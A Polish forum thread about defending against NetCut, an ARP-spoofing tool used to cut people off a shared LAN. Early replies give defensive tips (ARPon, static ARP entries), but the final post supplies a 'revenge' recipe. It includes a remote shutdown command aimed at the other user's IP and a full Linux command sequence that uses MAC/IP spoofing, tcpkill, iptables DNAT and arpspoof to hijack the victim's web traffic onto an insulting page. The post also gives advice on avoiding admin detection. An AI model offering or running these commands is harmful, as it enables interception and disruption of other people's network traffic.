Jak zabezpieczyć się przed NetCutem?

aniolek-tasmanski

Były Administrator
Dołączył
Październik 31, 2002
Posty
514
smile.gif


Zobacz: Tutaj i Tutaj

aniolek
 

9adasko

Użytkownik
Dołączył
Marzec 19, 2006
Posty
1
Net Cut !!!

Jestem w sieci LAN, czasami ktoś mnie odłącza programem Net Cut, można coś zrobić żeby nie dało rady odłączać tym programem? Obecnie mamy serwer zrobiony z komputera, w najbliższych dniach zamierzamy zrobić sieć na Routerze, czy przez routera tez normalnie będą mogli odcinać? A może da rade to jakoś zablokować czy coś? :/
 

pkoper

Były Moderator
Dołączył
Marzec 9, 2006
Posty
302
Z powodu podobnej tematyki skleiłem powyższy topic z istniejącym wcześniej tematem.
 

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
Odkopane ale jakby ktos nie wiedzial: http://arpon.sourceforge.net/ uniemozliwia dzialanie netcut'a.

albo ustawic statyczna tablice arp:

start > uruchom > cmd
arp -s nasze_ip nasz_mac

zemsta jest slodka (w cmd):

shutdown -m ip_lamusa -s -t 5 -c "jestes cipa i tyle!"

na linuxie:

ifconfig eth0 down
macchanger -m fake_mac eth0 // lub random // macchanger -r eth0 // lub // ifconfig eth0 hw ether fake_mac (aby umozliwic dublowanie istniejacego juz ip+mac w sieci musimy rozlaczyc np. tcpkillem polaczenia ESTABLISHED,NEW docelowego komputera na portach udp 53,67,68 dla ipv4)
ifconfig eth0 fake_ip netmask maska_sieci up
apt-get install apache2
a2enmod rewrite
/etc/init.d/apache2 restart
echo "Jestes cipa i tyle!" > /var/www/index.php
echo "RewriteEngine on" > /var/www/.htaccess
echo "RewriteCond %{REQUEST_FILENAME} !-d" >> /var/www/.htaccess
echo "RewriteCond %{REQUEST_FILENAME} !-f" >> /var/www/.htaccess
echo "RewriteRule . index.php [L]
" >> /var/www/.htaccess

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -s ip_lamusa -p tcp --dport 20: -j DNAT --to-destination fake_ip:80
arpspoof -i eth0 -t ip_lamusa ip_bramy

:)

Ps. nie jestesmy w 100 % anonimowi, jezeli administrator dysponuje odpowiednim sprzetem sieciowym switche, vlany przelaczniki i sterta innych odpowiednio skonfigurowanych ******* to moze sprawdzic w logach z ktorego vlana modyfikowalismy wpisy arp itp itd.... na szczescie wiekszosc osiedlowych/akademickich adminow to pojeby :)
 
Ostatnia edycja:
Do góry Bottom